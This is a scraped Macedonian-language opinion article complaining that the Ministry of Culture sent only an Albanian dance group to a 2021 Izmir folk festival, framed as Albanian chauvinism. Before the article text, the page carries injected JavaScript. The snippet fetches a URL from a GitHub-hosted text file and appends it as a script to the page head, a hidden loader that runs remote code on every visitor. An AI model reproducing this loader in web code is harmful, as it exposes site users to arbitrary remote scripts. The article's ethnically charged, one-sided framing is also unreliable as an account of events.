;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Ленка: На меѓународен фестивал Македонија е претставена само од албанска танцувачка група - Антропол
АктуелноЛокално

Ленка: На меѓународен фестивал Македонија е претставена само од албанска танцувачка група

На меѓународениот фестивал 15th Izmir Balkan Folk Dance and Culture Festival – 2021, кој се одржа во Турција, Министерството за култура предводено од министерката Ирена Стефоска, испратило албанска танцувачка група да ја презентира традиционалната култура на Република Македонија. Секоја од другите држави учеснички очигледно е дека ги претставуваат културните достигнувања на својата конститутивна нација, а не на малцинствата. Со овој потег,  министерката и нејзиниот државен секретар Валмир Азири, очигледно сакаат да испратат порака до македонскиот народ, дека северна de fakto е веќе федерација со два конститутивни народи.

Од видеото од настанот, јасно може да се види дека секоја нација е претсавена преку традиционалните носии и танци на својот народ, додека Македонија е претставена преку носии и танци на друга нација (во случајот албанската), со цел во јавноста да се создаде погрешна претстава дека и албанскиот народ е конститутивен народ во оваа држава, а не етникум, со што уште еднаш на дело се покажува големоалбанскиот шовинизам и нивните аспирации во оваа држава. Всушност, на овој настан нема никакво претставување и целосно се изоставени културните специфичности и достигнувања на македонскиот народ.

Албанците имаат своја држава и култура која е повикана да ги претставува нивните традиции, додека македонскиот народ ја има само оваа држава и нејзините културни особености како свој единствен дом. „Северна“ е претворена во племенска заедница на етникуми, постмодерен експеримент, каде конститутивната македонска нација како КОХЕЗИВЕН елемент и јадро на државата е целосно разорена.